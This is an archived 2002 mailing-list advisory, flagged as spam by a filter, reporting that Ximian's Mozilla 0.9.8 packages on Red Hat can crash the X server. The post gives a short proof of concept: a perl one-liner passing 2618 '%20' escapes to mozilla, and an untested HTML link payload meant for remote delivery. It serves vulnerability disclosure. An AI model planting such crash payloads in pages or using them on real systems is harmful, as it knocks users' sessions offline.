*****SPAM***** Ximian Mozilla: The 2618 Bug

From: Replugge [Rod] (repluggeat_private)
Date: Sun Feb 17 2002 - 08:24:28 PST

    SPAM: -------------------- Start SpamAssassin results ----------------------
    SPAM: This mail is probably spam.  The original message has been altered
    SPAM: so you can recognise or block similar unwanted mail in future.
    SPAM: See http://spamassassin.org/tag/ for more details.
    SPAM:
    SPAM: Content analysis details:   (5.8 hits, 5 required)
    SPAM: Hit! (4 points)    BODY: Uses %-escapes inside a URL's hostname
    SPAM: Hit! (1.8 points)  No MX records for the From: domain
    SPAM:
    SPAM: -------------------- End of SpamAssassin results ---------------------

    NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't
    make it since this doesn't seem to affect a redhat itself, it affects
    the mozilla packages distrbuted by Ximian:

    The test system look like:

    bash#~ rpm -qa | grep mozilla
    mozilla-0.9.8-1.ximian.2
    mozilla-mail-0.9.8-1.ximian.2
    mozilla-xmlterm-0.9.8-1.ximian.2
    mozilla-devel-0.9.8-1.ximian.2
    nautilus-mozilla-1.0.6-ximian.4
    mozilla-psm-0.9.8-1.ximian.2
    kdebindings-kmozilla-2.1.1-1

    This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the
    the updates).

    There is a bug in mozilla 0.9.8-1 which allows you
    to Crash the X server.

    I won't go into details I'll just show the proof
    of concept.

    exploit:

    Local:
    bash#~ mozilla `perl -e "print '%20' x 2618"`

    Remote:
    I haven't test this but i guess:

    echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
    ./attack.html

    perhaps using "img src" or java script...

    Best Regards

    --
    /*
    Rodrigo Gutierrez                   <rodrigoat_private>